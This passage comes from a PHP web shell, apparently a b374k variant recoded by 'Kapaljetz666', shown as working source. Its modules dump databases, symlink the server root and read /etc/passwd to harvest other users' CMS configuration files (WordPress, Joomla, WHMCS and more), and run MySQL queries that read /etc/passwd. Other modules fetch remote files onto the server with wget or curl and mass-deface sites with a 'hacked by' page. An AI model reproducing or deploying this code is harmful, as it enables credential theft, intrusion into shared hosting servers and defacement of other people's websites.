2116 <input class="inputzbut" type=submit value=" Dump! " ></td></tr>
2117 </form></center></table>';
2118if ($_POST['username'] && $_POST['dbname'] && $_POST['method']){
2119$date = date("Y-m-d");
2120$dbserver = $_POST['server'];
2121$dbuser = $_POST['username'];
2122$dbpass = $_POST['password'];
2123$dbname = $_POST['dbname'];
2124$file = "Dump-$dbname-$date";
2125$method = $_POST['method'];
2126if ($method=='sql'){
2127$file="Dump-$dbname-$date.sql";
2128$fp=fopen($file,"w");
2129}else{
2130$file="Dump-$dbname-$date.sql.gz";
2131$fp = gzopen($file,"w");
2132}
2133function write($data) {
2134global $fp;
2135if ($_POST['method']=='ssql'){
2136fwrite($fp,$data);
2137}else{
2138gzwrite($fp, $data);
2139}}
2140mysql_connect ($dbserver, $dbuser, $dbpass);
2141mysql_select_db($dbname);
2142$tables = mysql_query ("SHOW TABLES");
2143while ($i = mysql_fetch_array($tables)) {
2144 $i = $i['Tables_in_'.$dbname];
2145 $create = mysql_fetch_array(mysql_query ("SHOW CREATE TABLE ".$i));
2146 write($create['Create Table'].";\n\n");
2147 $sql = mysql_query ("SELECT * FROM ".$i);
2148 if (mysql_num_rows($sql)) {
2149 while ($row = mysql_fetch_row($sql)) {
2150 foreach ($row as $j => $k) {
2151 $row[$j] = "'".mysql_escape_string($k)."'";
2152 }
2153 write("INSERT INTO $i VALUES(".implode(",", $row).");\n");
2154 }
2155 }
2156}
2157if ($method=='ssql'){
2158fclose ($fp);
2159}else{
2160gzclose($fp);}
2161header("Content-Disposition: attachment; filename=" . $file);
2162header("Content-Type: application/download");
2163header("Content-Length: " . filesize($file));
2164flush();
2165
2166$fp = fopen($file, "r");
2167while (!feof($fp))
2168{
2169 echo fread($fp, 65536);
2170 flush();
2171}
2172fclose($fp);
2173}
2174
2175}
2176
2177/* Goblok
2178 start here */
2179// domain viewer by S1r_V1ru5 rec0de by Kapaljetz666
2180 elseif(isset($_GET['x']) && ($_GET['x'] == 'dv')){ @ini_set('output_buffering',0);
2181{
2182 ?>
2183 <form action="?y=<?php echo $pwd; ?>&x=dv" method="post">
2184 <center><h2>Domain Viewer by S1r_V1ru5<br>notes: if blank(no domain) that mean not work use domain viewer, you can use symlink server</center><br><br>
2185 <?php
2186 function openBaseDir()
2187{
2188$openBaseDir = ini_get("open_basedir");
2189if (!$openBaseDir)
2190 {
2191 $openBaseDir = '<font color="green">OFF</font>';
2192 }
2193 else
2194 {
2195 $openBaseDir = '<font color="red">ON</font>';
2196 }
2197 return $openBaseDir;
2198}
2199
2200
2201echo '
2202 <table width="95%" cellspacing="0" cellpadding="0" class="td1" >
2203 <td height="100" align="left" class="td1">';
2204 $pg = basename(__FILE__);
2205 $safe_mode = @ini_get('safe_mode');
2206 $dir = @getcwd();
2207 ////////////////////////////////////////////////////
2208 // LET'S PLAY ~
2209 ##.htaccess
2210@mkdir('pee',0777);
2211@symlink("/","pee/root");
2212$htaccss = "Options all
2213 DirectoryIndex Sux.html
2214 AddType text/plain .php
2215 AddHandler server-parsed .php
2216 AddType text/plain .html
2217 AddHandler txt .html
2218 Require None
2219 Satisfy Any";
2220
2221file_put_contents("pee/.htaccess",$htaccss);
2222$etc = file_get_contents("/etc/passwd");
2223$etcz = explode("\n",$etc);
2224
2225
2226##Symlink to the ROOT :p
2227foreach($etcz as $etz){
2228$etcc = explode(":",$etz);
2229error_reporting(0);
2230
2231$current_dir = posix_getcwd();
2232$dir = explode("/",$current_dir);
2233
2234symlink('/'.$dir[1].'/'.$etcc[0].'/'.$dir[3].'/wp-config.php',"pee/".$etcc[0].'-WordPress.txt');
2235symlink('/'.$dir[1].'/'.$etcc[0].'/'.$dir[3].'/blog/wp-config.php',"pee/".$etcc[0].'-WordPress.txt');
2236symlink('/'.$dir[1].'/'.$etcc[0].'/'.$dir[3].'/wp/wp-config.php',"pee/".$etcc[0].'-WordPress.txt');
2237symlink('/'.$dir[1].'/'.$etcc[0].'/'.$dir[3].'/site/wp-config.php',"pee/".$etcc[0].'-WordPress.txt');
2238symlink('/'.$dir[1].'/'.$etcc[0].'/'.$dir[3].'/config.php',"pee/".$etcc[0].'-PhpBB.txt');
2239symlink('/'.$dir[1].'/'.$etcc[0].'/'.$dir[3].'/includes/config.php',"pee/".$etcc[0].'-vBulletin.txt');
2240symlink('/'.$dir[1].'/'.$etcc[0].'/'.$dir[3].'/configuration.php',"pee/".$etcc[0].'-Joomla.txt');
2241symlink('/'.$dir[1].'/'.$etcc[0].'/'.$dir[3].'/web/configuration.php',"pee/".$etcc[0].'-Joomla.txt');
2242symlink('/'.$dir[1].'/'.$etcc[0].'/'.$dir[3].'/joomla/configuration.php',"pee/".$etcc[0].'-Joomla.txt');
2243symlink('/'.$dir[1].'/'.$etcc[0].'/'.$dir[3].'/site/configuration.php',"pee/".$etcc[0].'-Joomla.txt');
2244symlink('/'.$dir[1].'/'.$etcc[0].'/'.$dir[3].'/conf_global.php',"pee/".$etcc[0].'-IPB.txt');
2245symlink('/'.$dir[1].'/'.$etcc[0].'/'.$dir[3].'/inc/config.php',"pee/".$etcc[0].'-MyBB.txt');
2246symlink('/'.$dir[1].'/'.$etcc[0].'/'.$dir[3].'/Settings.php',"pee/".$etcc[0].'-SMF.txt');
2247symlink('/'.$dir[1].'/'.$etcc[0].'/'.$dir[3].'/sites/default/settings.php',"pee/".$etcc[0].'-Drupal.txt');
2248symlink('/'.$dir[1].'/'.$etcc[0].'/'.$dir[3].'/e107_config.php',"pee/".$etcc[0].'-e107.txt');
2249symlink('/'.$dir[1].'/'.$etcc[0].'/'.$dir[3].'/datas/config.php',"pee/".$etcc[0].'-Seditio.txt');
2250symlink('/'.$dir[1].'/'.$etcc[0].'/'.$dir[3].'/includes/configure.php',"pee/".$etcc[0].'-osCommerce.txt');
2251symlink('/'.$dir[1].'/'.$etcc[0].'/'.$dir[3].'/client/configuration.php',"pee/".$etcc[0].'-WHMCS.txt');
2252symlink('/'.$dir[1].'/'.$etcc[0].'/'.$dir[3].'/clientes/configuration.php',"pee/".$etcc[0].'-WHMCS.txt');
2253symlink('/'.$dir[1].'/'.$etcc[0].'/'.$dir[3].'/support/configuration.php',"pee/".$etcc[0].'-WHMCS.txt');
2254symlink('/'.$dir[1].'/'.$etcc[0].'/'.$dir[3].'/supportes/configuration.php',"pee/".$etcc[0].'-WHMCS.txt');
2255symlink('/'.$dir[1].'/'.$etcc[0].'/'.$dir[3].'/whmcs/configuration.php',"pee/".$etcc[0].'-WHMCS.txt');
2256symlink('/'.$dir[1].'/'.$etcc[0].'/'.$dir[3].'/domain/configuration.php',"pee/".$etcc[0].'-WHMCS.txt');
2257symlink('/'.$dir[1].'/'.$etcc[0].'/'.$dir[3].'/hosting/configuration.php',"pee/".$etcc[0].'-WHMCS.txt');
2258symlink('/'.$dir[1].'/'.$etcc[0].'/'.$dir[3].'/whmc/configuration.php',"pee/".$etcc[0].'-WHMCS.txt');
2259symlink('/'.$dir[1].'/'.$etcc[0].'/'.$dir[3].'/billing/configuration.php',"pee/".$etcc[0].'-WHMCS.txt');
2260symlink('/'.$dir[1].'/'.$etcc[0].'/'.$dir[3].'/portal/configuration.php',"pee/".$etcc[0].'-WHMCS.txt');
2261symlink('/'.$dir[1].'/'.$etcc[0].'/'.$dir[3].'/order/configuration.php',"pee/".$etcc[0].'-WHMCS.txt');
2262symlink('/'.$dir[1].'/'.$etcc[0].'/'.$dir[3].'/clientarea/configuration.php',"pee/".$etcc[0].'-WHMCS.txt');
2263symlink('/'.$dir[1].'/'.$etcc[0].'/'.$dir[3].'/domains/configuration.php',"pee/".$etcc[0].'-WHMCS.txt');
2264}
2265#############################
2266 if(is_readable("/var/named")){
2267 echo'<table align="center" border="1" width="45%" cellspacing="0" cellpadding="4" class="td1">';
2268 echo'<tr><td><center><b>SITE</b></center></td><td>
2269 <center><b>USER</b></center></td>
2270 <td></center><b>SYMLINK</b></center></td>';
2271 $list = scandir("/var/named");
2272 foreach($list as $domain){
2273 if(strpos($domain,".db")){
2274 $i += 1;
2275 $domain = str_replace('.db','',$domain);
2276 $owner = posix_getpwuid(fileowner("/etc/valiases/".$domain));
2277
2278 echo "<tr><td class='td1'><a href='http://".$domain." '>".$domain."</a></td>
2279 <td class='td1'><center><font color='red'>".$owner['name']."</font></center></td>
2280 <td class='td1'><center><a href='pee/root".$owner['dir']."/".$dir[3]."' target='_blank'>DIR</a></center></td>";
2281 }
2282 }
2283 echo "<center>Total Domains Found: ".$i."</center><br />";
2284 }else{
2285 echo "<tr><td class='td1'>can't read [ /var/named ]</td><tr>"; }
2286
2287break;
2288
2289##################################
2290error_reporting(0);
2291$etc = file_get_contents("/etc/passwd");
2292$etcz = explode("\n",$etc);
2293if(is_readable("/etc/passwd")){
2294
2295echo'<table align="center" border="1" width="45%" cellspacing="0" cellpadding="4" class="td1">';
2296echo'<tr><td><center><b>SITE</b></center></td><td><center><b>USER</b></center></td><td><center><b>SYMLINK</b></center></td>';
2297
2298$list = scandir("/var/named");
2299
2300foreach($etcz as $etz){
2301$etcc = explode(":",$etz);
2302
2303foreach($list as $domain){
2304if(strpos($domain,".db")){
2305$domain = str_replace('.db','',$domain);
2306$owner = posix_getpwuid(fileowner("/etc/valiases/".$domain));
2307if($owner['name'] == $etcc[0])
2308{
2309$i += 1;
2310echo "<tr><td class='td1'><a href='http://".$domain." '>".$domain."</a></td><center>
2311<td class='td1'><font color='red'>".$owner['name']."</font></center></td>
2312<td class='td1'><center><a href='pee/root".$owner['dir']."/".$dir[3]."' target='_blank'>DIR</a></center></td>";
2313}}}}
2314echo "<center>Total Domains Found: ".$i."</center><br />";}
2315
2316break;
2317###############################
2318if(is_readable("/etc/named.conf")){
2319echo'<table align="center" border="1" width="45%" cellspacing="0" cellpadding="4" class="td1">';
2320echo'<tr><td><center><b>SITE</b></center></td><td><center><b>USER</b></center></td><td></center><b>SYMLINK</b></center></td>';
2321$named = file_get_contents("/etc/named.conf");
2322preg_match_all('%zone \"(.*)\" {%',$named,$domains);
2323foreach($domains[1] as $domain){
2324$domain = trim($domain);
2325$i += 1;
2326$owner = posix_getpwuid(fileowner("/etc/valiases/".$domain));
2327echo "<tr><td class='td1'><a href='http://".$domain." '>".$domain."</a></td><td class='td1'><center><font color='red'>".$owner['name']."</font></center></td><td class='td1'><center><a href='pee/root".$owner['dir']."/".$dir[3]."' target='_blank'>DIR</a></center></td>";
2328}
2329echo "<center>Total Domains Found: ".$i."</center><br />";
2330
2331} else { echo "<tr><td class='td1'>can't read [ /etc/named.conf ]</td></tr>"; }
2332
2333break;
2334############################
2335if(is_readable("/etc/valiases")){
2336echo'<table align="center" border="1" width="45%" cellspacing="0" cellpadding="4" class="td1">';
2337echo'<tr><td><center><b>SITE</b></center></td><td>
2338<center><b>USER</b></center></td><td></center>
2339<b>SYMLINK</b></center></td>';
2340$list = scandir("/etc/valiases");
2341foreach($list as $domain){
2342$i += 1;
2343$owner = posix_getpwuid(fileowner("/etc/valiases/".$domain));
2344echo "<tr><td class='td1'><a href='http://".$domain." '>".$domain."</a></td>
2345<center><td class='td1'><font color='red'>".$owner['name']."</font></center></td>
2346<td class='td1'><center><a href='pee/root".$owner['dir']."/".$dir[3]."' target='_blank'>DIR</a></center></td>";
2347}
2348echo "<center>Total Domains Found: ".$i."</center><br />";
2349} else { echo "<tr><td class='td1'>can't read [ /etc/valiases ]</td></tr>"; }
2350
2351break;
2352}}
2353##########################
2354#JembutLoyality
2355##########################################
2356#######################
2357########################
2358# JAAAAAAAAAAAAANCCCCCCCCCCCOOOOOOOOOOOOOK
2359##################
2360# recode by Kapaljetz666
2361#########################
2362#gue kasih skat biar ga pusing :v
2363##################################
2364//////////////////
2365########################################################################
2366########################################################################
2367#########################################################################
2368# END
2369############## MYSQL ########################################
2370elseif(isset($_GET['x']) && ($_GET['x'] == 'mysql')){if(isset($_GET['sqlhost']) && isset($_GET['sqluser']) && isset($_GET['sqlpass']) && isset($_GET['sqlport']))
2371{
2372$sqlhost = $_GET['sqlhost'];
2373$sqluser = $_GET['sqluser'];
2374$sqlpass = $_GET['sqlpass'];
2375$sqlport = $_GET['sqlport'];
2376if($con = @mysql_connect($sqlhost.":".$sqlport,$sqluser,$sqlpass))
2377{
2378$msg .= "<div style='width:99%;padding:4px 10px 0 10px;'>";
2379$msg .= "<p>Connected to ".$sqluser."<span class='gaya'>@</span>".$sqlhost.":".$sqlport;$msg .= " <span class='gaya'>-></span> <a href='?y=".$pwd."&x=mysql&sqlhost=".$sqlhost."&sqluser=".$sqluser."&sqlpass=".$sqlpass."&sqlport=".$sqlport."&'>[ databases ]</a>";
2380if(isset($_GET['db'])) $msg .= " <span class='gaya'>-></span> <a href='?y=".$pwd."&x=mysql&sqlhost=".$sqlhost."&sqluser=".$sqluser."&sqlpass=".$sqlpass."&sqlport=".$sqlport."&db=".$_GET['db']."'>".htmlspecialchars($_GET['db'])."</a>";
2381if(isset($_GET['table'])) $msg .= " <span class='gaya'>-></span> <a href='?y=".$pwd."&x=mysql&sqlhost=".$sqlhost."&sqluser=".$sqluser."&sqlpass=".$sqlpass."&sqlport=".$sqlport."&db=".$_GET['db']."&table=".$_GET['table']."'>".htmlspecialchars($_GET['table'])."</a>";
2382$msg .= "</p><p>version : ".mysql_get_server_info($con)." proto ".mysql_get_proto_info($con)."</p>";$msg .= "</div>";echo $msg;if(isset($_GET['db']) && (!isset($_GET['table'])) && (!isset($_GET['sqlquery']))){$db = $_GET['db'];$query = "DROP TABLE IF EXISTS b374k_table;\nCREATE TABLE `b374k_table` ( `file` LONGBLOB NOT NULL );\nLOAD DATA INFILE '/etc/passwd'\nINTO TABLE b374k_table;SELECT * FROM b374k_table;\nDROP TABLE IF EXISTS b374k_table;";
2383$msg = "<div style='width:99%;padding:0 10px;'><form action='?' method='get'><input type='hidden' name='y' value='".$pwd."' /> <input type='hidden' name='x' value='mysql' /> <input type='hidden' name='sqlhost' value='".$sqlhost."' /> <input type='hidden' name='sqluser' value='".$sqluser."' /> <input type='hidden' name='sqlport' value='".$sqlport."' /> <input type='hidden' name='sqlpass' value='".$sqlpass."' /> <input type='hidden' name='db' value='".$db."' /> <p><textarea name='sqlquery' class='output' style='width:98%;height:80px;'>$query</textarea></p> <p><input class='inputzbut' style='width:80px;' name='submitquery' type='submit' value='Go !' /></p> </form></div> ";
2384$tables = array();
2385$msg .= "<table class='explore' style='width:99%;'><tr><th>available tables on ".$db."</th></tr>";$hasil = @mysql_list_tables($db,$con);
2386while(list($table) = @mysql_fetch_row($hasil)){@array_push($tables,$table);} @sort($tables);
2387foreach($tables as $table){
2388$msg .= "<tr><td><a href='?y=".$pwd."&x=mysql&sqlhost=".$sqlhost."&sqluser=".$sqluser."&sqlpass=".$sqlpass."&sqlport=".$sqlport."&db=".$db."&table=".$table."'>$table</a></td></tr>";} $msg .= "</table>";}
2389elseif(isset($_GET['table']) && (!isset($_GET['sqlquery']))){
2390$db = $_GET['db'];$table = $_GET['table'];$query = "SELECT * FROM ".$db.".".$table." LIMIT 0,100;";$msgq = "<div style='width:99%;padding:0 10px;'><form action='?' method='get'> <input type='hidden' name='y' value='".$pwd."' /> <input type='hidden' name='x' value='mysql' /> <input type='hidden' name='sqlhost' value='".$sqlhost."' /> <input type='hidden' name='sqluser' value='".$sqluser."' /> <input type='hidden' name='sqlport' value='".$sqlport."' /> <input type='hidden' name='sqlpass' value='".$sqlpass."' /> <input type='hidden' name='db' value='".$db."' /> <input type='hidden' name='table' value='".$table."' /> <p><textarea name='sqlquery' class='output' style='width:98%;height:80px;'>".$query."</textarea></p> <p><input class='inputzbut' style='width:80px;' name='submitquery' type='submit' value='Go !' /></p> </form></div> ";$columns = array();$msg = "<table class='explore' style='width:99%;'>";$hasil = @mysql_query("SHOW FIELDS FROM ".$db.".".$table);while(list($column) = @mysql_fetch_row($hasil)){$msg .= "<th>$column</th>";$kolum = $column;}$msg .= "</tr>";$hasil = @mysql_query("SELECT count(*) FROM ".$db.".".$table);
2391list($total) = mysql_fetch_row($hasil);
2392if(isset($_GET['z'])) $page = (int) $_GET['z'];
2393else $page = 1;$pagenum = 100;$totpage = ceil($total / $pagenum);$start = (($page - 1) * $pagenum);$hasil = @mysql_query("SELECT * FROM ".$db.".".$table." LIMIT ".$start.",".$pagenum);
2394while($datas = @mysql_fetch_assoc($hasil)){$msg .= "<tr>";foreach($datas as $data){if(trim($data) == "")
2395$data = " ";$msg .= "<td>$data</td>";}$msg .= "</tr>";} $msg .= "</table>";$head = "<div style='padding:10px 0 0 6px;'> <form action='?' method='get'> <input type='hidden' name='y' value='".$pwd."' /> <input type='hidden' name='x' value='mysql' /> <input type='hidden' name='sqlhost' value='".$sqlhost."' /> <input type='hidden' name='sqluser' value='".$sqluser."' /> <input type='hidden' name='sqlport' value='".$sqlport."' /> <input type='hidden' name='sqlpass' value='".$sqlpass."' /> <input type='hidden' name='db' value='".$db."' /> <input type='hidden' name='table' value='".$table."' /> Page <select class='inputz' name='z' onchange='this.form.submit();'>";
2396for($i = 1;$i <= $totpage;$i++){$head .= "<option value='".$i."'>".$i."</option>";
2397if($i == $_GET['z']) $head .= "<option value='".$i."' selected='selected'>".$i."</option>";} $head .= "</select><noscript><input class='inputzbut' type='submit' value='Go !' /></noscript></form></div>";$msg = $msgq.$head.$msg;}
2398elseif(isset($_GET['submitquery']) && ($_GET['sqlquery'] != "")){$db = $_GET['db'];$query = magicboom($_GET['sqlquery']);
2399$msg = "<div style='width:99%;padding:0 10px;'><form action='?' method='get'> <input type='hidden' name='y' value='".$pwd."' /> <input type='hidden' name='x' value='mysql' /> <input type='hidden' name='sqlhost' value='".$sqlhost."' /> <input type='hidden' name='sqluser' value='".$sqluser."' /> <input type='hidden' name='sqlport' value='".$sqlport."' /> <input type='hidden' name='sqlpass' value='".$sqlpass."' /> <input type='hidden' name='db' value='".$db."' /> <p><textarea name='sqlquery' class='output' style='width:98%;height:80px;'>".$query."</textarea></p> <p><input class='inputzbut' style='width:80px;' name='submitquery' type='submit' value='Go !' /></p> </form></div> ";@mysql_select_db($db);$querys = explode(";",$query);foreach($querys as $query){if(trim($query) != ""){$hasil = mysql_query($query);
2400if($hasil){$msg .= "<p style='padding:0;margin:20px 6px 0 6px;'>".$query."; <span class='gaya'>[</span> ok <span class='gaya'>]</span></p>";$msg .= "<table class='explore' style='width:99%;'><tr>";
2401for($i=0;$i<@mysql_num_fields($hasil);$i++) $msg .= "<th>".htmlspecialchars(@mysql_field_name($hasil,$i))."</th>";$msg .= "</tr>";for($i=0;$i<@mysql_num_rows($hasil);$i++) {$rows=@mysql_fetch_array($hasil);$msg .= "<tr>";for($j=0;$j<@mysql_num_fields($hasil);$j++) {
2402if($rows[$j] == "") $dataz = " ";
2403else $dataz = $rows[$j];$msg .= "<td>".$dataz."</td>";} $msg .= "</tr>";} $msg .= "</table>";}
2404else $msg .= "<p style='padding:0;margin:20px 6px 0 6px;'>".$query."; <span class='gaya'>[</span> error <span class='gaya'>]</span></p>";} } }
2405else {$query = "SHOW PROCESSLIST;\nSHOW VARIABLES;\nSHOW STATUS;";$msg = "<div style='width:99%;padding:0 10px;'><form action='?' method='get'> <input type='hidden' name='y' value='".$pwd."' /><input type='hidden' name='x' value='mysql' /><input type='hidden' name='sqlhost' value='".$sqlhost."' /><input type='hidden' name='sqluser' value='".$sqluser."' /><input type='hidden' name='sqlport' value='".$sqlport."' /><input type='hidden' name='sqlpass' value='".$sqlpass."' /><input type='hidden' name='db' value='".$db."' /><p><textarea name='sqlquery' class='output' style='width:98%;height:80px;'>".$query."</textarea></p><p><input class='inputzbut' style='width:80px;' name='submitquery' type='submit' value='Go !' /></p></form></div> ";$dbs = array();$msg .= "<table class='explore' style='width:99%;'><tr><th>available databases</th></tr>";$hasil = @mysql_list_dbs($con);
2406while(list($db) = @mysql_fetch_row($hasil)){@array_push($dbs,$db);} @sort($dbs);foreach($dbs as $db){
2407$msg .= "<tr><td><a href='?y=".$pwd."&x=mysql&sqlhost=".$sqlhost."&sqluser=".$sqluser."&sqlpass=".$sqlpass."&sqlport=".$sqlport."&db=".$db."'>$db</a></td></tr>";} $msg .= "</table>";}
2408@mysql_close($con);} else $msg = "<p style='text-align:center;'>can't connect</p>";echo $msg;} else{?>
2409<br><center><div class="mybox"><h2 class="k2ll33d2">MySQL Connect !<br>if you want use mysql interface by S4MP4H, change url '&x=mysq' to '&x=sql'</h2>
2410<form action="?" method="get"><input type="hidden" name="y" value="<?php echo $pwd;?>" />
2411<input type="hidden" name="x" value="mysql" /><table class="tabnet" style="width:300px;"> <tr>
2412<th colspan="2">Connection Form</th></tr> <tr><td> Host</td><td>
2413<input style="width:220px;" class="inputz" type="text" name="sqlhost" value="localhost" /></td></tr>
2414<tr><td> Username</td><td><input style="width:220px;" class="inputz" type="text" name="sqluser" value="root" /></td></tr>
2415<tr><td> Password</td><td><input style="width:220px;" class="inputz" type="text" name="sqlpass" value="password" /></td></tr>
2416<tr><td> Port</td><td><input style="width:80px;" class="inputz" type="text" name="sqlport" value="3306" /> <input style="width:19%;" class="inputzbut" type="submit" value="Go !" name="submitsql" />
2417</td></tr></table></form></div></center>
2418<?
2419 }
2420 }
2421########################################################################
2422# START UPLOAD #
2423elseif(isset($_REQUEST['upload'])){ $s_result = " "; $msg = "";
2424if(isset($_POST['uploadcomp'])){
2425 if(is_uploaded_file($_FILES['file']['tmp_name'])){
2426 $path = magicboom($_POST['path']);
2427 $fname = $_FILES['file']['name'];
2428 $tmp_name = $_FILES['file']['tmp_name'];
2429 $pindah = $path.$fname;
2430 $stat = @move_uploaded_file($tmp_name,$pindah);
2431 if ($stat) {
2432 $msg = "file uploaded to $pindah";
2433 }
2434 else $msg = "failed to upload $fname";
2435 }
2436 else $msg = "failed to upload $fname";
2437}
2438elseif(isset($_POST['uploadurl'])){
2439 $pilihan = trim($_POST['pilihan']);
2440 $wurl = trim($_POST['wurl']);
2441 $path = magicboom($_POST['path']);
2442 $namafile = download($pilihan,$wurl);
2443 $pindah = $path.$namafile;
2444 if(is_file($pindah)) {
2445 $msg = "file uploaded to $pindah";
2446 }
2447 else $msg = "failed to upload $namafile";
2448
2449}
2450?>
2451<form action="?y=<?php echo $pwd; ?>&x=upload" enctype="multipart/form-data" method="post">
2452<table class="tabnet" style="width:320px;padding:0 1px;">
2453<tr><th colspan="2">Upload from computer</th></tr>
2454<tr><td colspan="2"><p style="text-align:center;"><input style="color:#FFFF00;" type="file" name="file" /><input type="submit" name="uploadcomp" class="inputzbut" value="Go" style="width:80px;"></p></td>
2455<tr><td colspan="2"><input type="text" class="inputz" style="width:99%;" name="path" value="<?php echo $pwd; ?>" /></td></tr>
2456</tr>
2457</table></form>
2458<table class="tabnet" style="width:320px;padding:0 1px;">
2459<tr><th colspan="2">Upload from url</th></tr>
2460<tr><td colspan="2"><form method="post" style="margin:0;padding:0;" actions="?y=<?php echo $pwd; ?>&x=upload">
2461<table><tr><td>url</td><td><input class="inputz" type="text" name="wurl" style="width:250px;" value="http://www.some-code/exploits.c"></td></tr>
2462<tr><td colspan="2"><input type="text" class="inputz" style="width:99%;" name="path" value="<?php echo $pwd; ?>" /></td></tr>
2463<tr><td><select size="1" class="inputz" name="pilihan">
2464<option value="wwget">wget</option>
2465<option value="wlynx">lynx</option>
2466<option value="wfread">fread</option>
2467<option value="wfetch">fetch</option>
2468<option value="wlinks">links</option>
2469<option value="wget">GET</option>
2470<option value="wcurl">curl</option>
2471</select></td><td colspan="2"><input type="submit" name="uploadurl" class="inputzbut" value="Go" style="width:246px;"></td></tr></form></table></td>
2472</tr>
2473</table>
2474<div style="text-align:center;margin:2px;"><?php echo $msg; ?></div>
2475<?php }
2476/////////////////////// END
2477/////////////////////// START HASH
2478elseif(isset($_GET['x']) && ($_GET['x'] == 'hash'))
2479 {
2480 ?>
2481 <?php
2482$submit= $_POST['enter'];
2483if (isset($submit)) {
2484$pass = $_POST['password']; // password
2485$salt = '}#f4ga~g%7hjg4&j(7mk?/!bj30ab-wi=6^7-$^R9F|GK5J#E6WT;IO[JN'; // random string
2486$hash = md5($pass); // md5 hash #1
2487$md4 = hash("md4",$pass);
2488$hash_md5 = md5($salt.$pass); // md5 hash with salt #2
2489$hash_md5_double = md5(sha1($salt.$pass)); // md5 hash with salt & sha1 #3
2490$hash1 = sha1($pass); // sha1 hash #4
2491$sha256 = hash("sha256",$text);
2492$hash1_sha1 = sha1($salt.$pass); // sha1 hash with salt #5
2493$hash1_sha1_double = sha1(md5($salt.$pass)); // sha1 hash with salt & md5 #6
2494}
2495echo '<form action="" method="post"><table class="tabnet">';
2496echo '<th colspan="2">Password Hash</th></center></tr>';
2497echo '<td><b>masukan kata yang ingin di encrypt:</b></td>';
2498echo '<td><input class="inputz" type="text" name="password" size="40" />';
2499echo '<input class="inputzbut" type="submit" name="enter" value="hash" />';
2500//echo '</td></tr><br>';
2501echo '<tr><th colspan="2">Hasil Hash</th></center></tr>';
2502echo '<tr><td>Original Password</td><td><input class=inputz type=text size=50 value='.$pass.'></td></tr>';
2503echo '<tr><td>MD5</td><td><input class=inputz type=text size=50 value='.$hash.'></td></tr>';
2504echo '<tr><td>MD4</td><td><input class=inputz type=text size=50 value='.$md4.'></td></tr>';
2505echo '<tr><td>MD5 with Salt</td><td><input class=inputz type=text size=50 value='.$hash_md5.'></td></tr>';
2506echo '<tr><td>MD5 with Salt & Sha1</td><td><input class=inputz type=text size=50 value='.$hash_md5_double.'></td></tr>';
2507echo '<tr><td>Sha1</td><td><input class=inputz type=text size=50 value='.$hash1.'></td></tr>';
2508echo '<tr><td>Sha256</td><td><input class=inputz type=text size=50 value='.$sha256.'></td></tr>';
2509echo '<tr><td>Sha1 with Salt</td><td><input class=inputz type=text size=50 value='.$hash1_sha1.'></td></tr>';
2510echo '<tr><td>Sha1 with Salt & MD5</td><td><input class=inputz type=text size=50 value='.$hash1_sha1_double.'></td></tr></table>';
2511}
2512
2513///////////// END OF HASH
2514########################################################################
2515######################################################
2516////START HASH ID
2517elseif(isset($_GET['x']) && ($_GET['x'] == 'hashid')) {
2518if(isset($_POST['gethash'])){
2519 $hash = $_POST['hash'];
2520 if(strlen($hash)==32){
2521 $hashresult = "MD5 Hash";
2522 }elseif(strlen($hash)==40){
2523 $hashresult = "SHA-1 Hash/ /MySQL5 Hash";
2524 }elseif(strlen($hash)==13){
2525 $hashresult = "DES(Unix) Hash";
2526 }elseif(strlen($hash)==16){
2527 $hashresult = "MySQL Hash / /DES(Oracle Hash)";
2528 }elseif(strlen($hash)==41){
2529 $GetHashChar = substr($hash, 40);
2530 if($GetHashChar == "*"){
2531 $hashresult = "MySQL5 Hash";
2532 }
2533 }elseif(strlen($hash)==64){
2534 $hashresult = "SHA-256 Hash";
2535 }elseif(strlen($hash)==96){
2536 $hashresult = "SHA-384 Hash";
2537 }elseif(strlen($hash)==128){
2538 $hashresult = "SHA-512 Hash";
2539 }elseif(strlen($hash)==34){
2540 if(strstr($hash, '$1$')){
2541 $hashresult = "MD5(Unix) Hash";
2542 }
2543 }elseif(strlen($hash)==37){
2544 if(strstr($hash, '$apr1$')){
2545 $hashresult = "MD5(APR) Hash";
2546 }
2547 }elseif(strlen($hash)==34){
2548 if(strstr($hash, '$H$')){
2549 $hashresult = "MD5(phpBB3) Hash";
2550 }
2551 }elseif(strlen($hash)==34){
2552 if(strstr($hash, '$P$')){
2553 $hashresult = "MD5(Wordpress) Hash";
2554 }
2555 }elseif(strlen($hash)==39){
2556 if(strstr($hash, '$5$')){
2557 $hashresult = "SHA-256(Unix) Hash";
2558 }
2559 }elseif(strlen($hash)==39){
2560 if(strstr($hash, '$6$')){
2561 $hashresult = "SHA-512(Unix) Hash";
2562 }
2563 }elseif(strlen($hash)==24){
2564 if(strstr($hash, '==')){
2565 $hashresult = "MD5(Base-64) Hash";
2566 }
2567 }else{
2568 $hashresult = "Hash type not found";
2569 }
2570 }else{
2571 $hashresult = "Not Hash Entered";
2572 }
2573
2574 ?>
2575 <center><br><Br><br>
2576
2577 <form action="" method="POST">
2578 <tr>
2579 <table class="tabnet">
2580 <th colspan="5">Hash Identification</th>
2581 <tr class="optionstr"><B><td>Enter Hash</td></b><td>:</td> <td><input type="text" name="hash" size='60' class="inputz" /></td><td><input type="submit" class="inputzbut" name="gethash" value="Identify Hash" /></td></tr>
2582 <tr class="optionstr"><b><td>Result</td><td>:</td><td><?php echo $hashresult; ?></td></tr></b>
2583 </table></tr></form>
2584 </center>
2585
2586 <?php
2587
2588}
2589//////////////////// MASS DEFACE START HERE
2590elseif(isset($_GET['x']) && ($_GET['x'] == 'mass'))
2591{
2592echo "<center/><br/><b><font color=white>Mass Deface (recode by Kapaljetz666)</font></b><br>";
2593error_reporting(0);?>
2594<form ENCTYPE="multipart/form-data" action="<?php $_SERVER['PHP_SELF']?>" method='post'>
2595<br>
2596<br>
2597note: if not domain in deface result, that mean this site not work mass deface (permission denied)<br><td><table><table class="tabnet" >
2598<form hethot='post'>
2599<tr>
2600 <tr>
2601 <td> Folder</td><td><input class ='inputz' type='text' name='path' size='60' value="<?php echo getcwd();?>"></td>
2602 </tr><br>
2603 <tr>
2604 <td>file name</td><td><input class ='inputz' type='text' name='file' size='60' value="del.htm"></td>
2605 </tr>
2606</tr>
2607<th colspan='2'><b>Script Deface</b></th><br></table>
2608<textarea style='background:black;outline:none;color:white;' name='index' rows='10' cols='67'>
2609<html>
2610<head>
2611<title>hacked by Kapaljetz666</title>
2612<link rel='SHORTCUT ICON' type='image/x-icon' href='http://i48.servimg.com/u/f48/16/08/07/74/indone10.gif'>
2613<meta name="robots" content="index, follow">
2614<meta name="Description" content="hacked by Kapaljetz666">
2615<meta name="keyword" content="hacked by Kapaljetz666">
2616<meta name="googlebot" content="index,follow" />
